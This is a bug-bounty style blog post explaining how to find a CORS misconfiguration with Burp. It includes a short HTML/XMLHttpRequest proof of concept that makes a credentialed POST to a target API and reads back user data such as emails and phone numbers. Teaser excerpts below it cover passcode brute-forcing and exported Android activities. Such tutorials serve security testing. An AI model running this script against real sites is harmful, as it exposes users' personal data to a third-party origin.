Skip to main content

Exploit CORS By POST Request

Short Description about CORS


An HTML5 cross-origin resource sharing (CORS) policy controls whether and how content running on other domains can perform two-way interaction with the domain that publishes the policy. The policy is fine-grained and can apply access controls per-request based on the URL and other features of the request.
Trusting arbitrary origins effectively disables the same-origin policy, allowing two-way interaction by third-party web sites. Unless the response consists only of unprotected public content, this policy is likely to present a security risk.
If the site specifies the header Access-Control-Allow-Credentials: true, third-party sites may be able to carry out privileged actions and retrieve sensitive information. Even if it does not, attackers may be able to bypass any IP-based access controls by proxying through users' browsers.


How to Verify CORS Misconfiguration
(If any application using the API their Possibilities of CORS Exist)

Case 1 >> Check-in Request Header     
Capture the /API/JSON Or /Ajax/index/data  Request in Burp and send it to Repeater now check the Response Date is reflected or not.
  • If JSON Data is reflected in response there is the possibility of CORS.
  •  Change the Origin and check the response there is any data or not. if there is not any data Reflected  in response Cors is patched
Case 2 >> Check-in Response Header  
  • Check for Access-Control-Allow-Origin*
  • If there is Access-Control-Allow-Origin* and Json Data is present in response there is cors misconfiguration.

How to exploit 
In the picture request method is Post and Access-Control-Allow-Origin* is present in the response.


In the picture request method is Post and Access-Control-Allow-Origin* is present in the response and also JSON data is present like user's possible sensitive information like Email Phone no. Adress or lot more stuff.



After that Host 
<html>

<script>

var req = new XMLHttpRequest(); req.onload = reqListener;

  req.open('POST',’ https://abc.com/ajax/index/init' ,true); req.withCredentials = true;

  req.send('{}'); function reqListener() { alert(this.responseText); };

</script>

</html> 

 this script on your local server. 



 After that go to network and check request and response here script executes successfully






 Here I got all the possible sensitive information of the user.









Thanks
Labels:

Comments

Post a Comment

Popular posts from this blog

Passcode Protection Bypass By Brute Forcing On zoho (Cliq Application)

First We discuss about what is passcode and Why it is Implemented in  Mobile Applications. PASSCODE Implemented in Mobile Application to protect Applications from an Unauthorized Access.like for example your cliq or any application account is logged in mobile phone .any your friend ask you to give phone , your friend try to open cliq application to see your message, but your friend cant open the application without entering passcode . he have to enter passcode for open, so it is an extra layer security in  applications. Passcode protection implemented in Android Application is an extra layer security to protect an unauthorized access. How Passcode Protection is bypassed by Bruteforcing? You know that passcode protection or pin protection in mobile applications have some attempt to enter passcode , if you enter  wrong passcode more than 5 times or 10 times based on application security , User logged out automatically and redirected to login page.but due to some ...
3 comments
Read more

Exploitation of Improper Export of Activities In Android Application

In android You know that every GUI interface is an  separate activity. An activity represents a single screen with a user interface just like window or frame of Java. In An application there are many activities depend on application functionalities. Let's take a example : An application that have   three modules login , register and   dashboard . For that there are there are three different activities for all these modules. What is export Means Here? In Android Application there is an attribute android: exported =true or false . This attribute is used in android   to provide an access to   other third party application to start their service , activities   and receive broadcast   messages. Like for an Example : If an application    have broadcast receiver to receive any events or message , if in that application exported attribute is set to true then this    broadcast message   can also receive by other thi...
Post a Comment
Read more

A New Way Of Brute force Passcode/Pin Protection By deep link

DESCRIPTION : AS you know already that what is passcode protection and why it is applied ? And how it is bypassed normally ? If you don’t know please read my previous blog:   https://negativewives.blogspot.com/2020/04/passcode-protection-bypass-by-brute.html                                                                                When any passcode protection is implemented first check any activity is exported or not ? Here we  only talking the scenario where no activity is exported in application   PROCEDURE : Open Application after implementing passcode protection. You see that passcode activity is launched first Go to AndroidMainfest.xml file and check launch mode of passcode activity . Question Arises in your mind   - ...
Post a Comment
Read more